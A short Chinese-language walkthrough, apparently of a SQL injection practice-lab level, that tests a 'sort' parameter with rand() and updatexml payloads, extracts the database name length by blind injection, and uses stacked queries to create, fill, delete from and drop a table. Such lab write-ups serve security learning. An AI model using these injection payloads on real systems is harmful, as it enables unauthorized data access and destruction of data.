这一关输入几次rand()页面发生了改变 说明这一关的注入类型属于数字型注入
接着尝试一下报错注入 输入如下
sort=updatexml(1,if(1=1,concat(0x7e,database(),0x7e),1),1)--+发现没有回显 显然不能使用报错注入 只能使用盲注了 这一关我们通过rand()函数的形式来实现盲注
首先我们判断出正确的页面和错误的页面
输入如下
sort=rand(1)回显如下
输入如下
sort=rand(0)回显如下
然后进行数据库长度获取操作 输入如下
sort=rand(length(database())=8)回显如下 说明数据库长度为8
剩余步骤我前几关已经有些过 大家可以去参考前几关 接着我要实现堆叠注入
首先创建一个表格 输入如下
sort=1;create table demo like users;--+数据库的回显如下所示
接着进行添加数据的操作 输入如下
sort=1;insert into demo values(1,'xiaoyang','101010');--+数据库回显如下所示
接着进行数据的删除操作 输入如下
sort=1;delete from demo where id=1;--+数据库的回显如下所示
接着进行删除表格操作 输入如下
sort=1;drop table demo;--+数据库的回显如下所示
binggo!!又好了嗨嗨!!
